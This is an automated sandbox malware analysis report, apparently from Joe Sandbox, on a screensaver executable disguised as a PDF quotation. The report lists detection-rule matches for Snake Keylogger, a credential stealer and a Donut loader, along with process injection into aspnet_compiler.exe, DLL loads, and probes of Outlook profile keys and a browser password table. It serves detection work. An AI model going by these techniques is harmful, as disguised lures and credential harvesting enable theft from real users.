Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2646867703.0000028ACEA50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2653955478.0000028ADE5A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: aspnet_compiler.exe PID: 5792, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 5792, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, FF1YoNsGP8eIQ23Q2kR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, FF1YoNsGP8eIQ23Q2kR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, FF1YoNsGP8eIQ23Q2kR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, FF1YoNsGP8eIQ23Q2kR.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, MockTracer.cs	Suspicious method names: .MockTracer.Inject
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, TextMapPropagator.cs	Suspicious method names: .TextMapPropagator.Inject
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, GlobalTracer.cs	Suspicious method names: .GlobalTracer.Inject
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, BinaryInjectAdapter.cs	Suspicious method names: .BinaryInjectAdapter.Set
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, BinaryInjectAdapter.cs	Suspicious method names: .BinaryInjectAdapter.Get
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, IPropagator.cs	Suspicious method names: ..Inject
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, TextMapInjectAdapter.cs	Suspicious method names: .TextMapInjectAdapter.GetEnumerator
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, TextMapInjectAdapter.cs	Suspicious method names: .TextMapInjectAdapter.Set
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, NoopTracer.cs	Suspicious method names: .NoopTracer.Inject
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, ConsolePropagator.cs	Suspicious method names: .ConsolePropagator.Inject
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, ITracer.cs	Suspicious method names: ..Inject
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, BinaryPropagator.cs	Suspicious method names: .BinaryPropagator.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@4/3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_compiler.exe, 00000005.00000002.3404892860.0000022945DCB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935FDE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935FFC000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.000002293602B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022936038000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935FEE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe "C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

